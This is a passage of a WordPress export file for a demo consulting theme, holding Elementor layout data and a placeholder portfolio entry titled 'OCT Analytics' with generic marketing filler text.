		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1218]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[778]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[thumb_size]]></wp:meta_key>
		<wp:meta_value><![CDATA[double_wh]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>OCT Analytics</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/oct-analytics/</link>
		<pubDate>Fri, 11 Sep 2020 04:45:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=810</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>May 22, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>810</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:45:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:45:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[oct-analytics]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[811]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"759b1f9d","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4bee6d25","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"e966785","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"517cac51","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"1f78d6b4","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"50e4423d","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"5eda56ee","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5124a12","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1813e19b","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2c9be0ed","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5f5cb943","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"382ee553","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ca083f3","elType":"widget","settings":{"editor":"<p>May 22, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"28cceda7","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5ef59f12","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6fd44f36","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"2ca63cf2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6351dbe6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"b82c2eb","elType":"section","settings":[],"elements":[{"id":"0ed0343","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"88b9927","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"a6a8004","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"64e9749","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"8f50949","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"3cc24ba","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"b029ec0","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ee2914c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"2c96d4e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"a9bf10d","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2184354","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7bd107e","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"63144c7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"0cf0002","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"d23fc57","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"12556b9","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"daae683","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"f340f47","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bc7b812","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"eee1034","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"207894e","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"882b748","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"752c39b","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"402b177","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"ba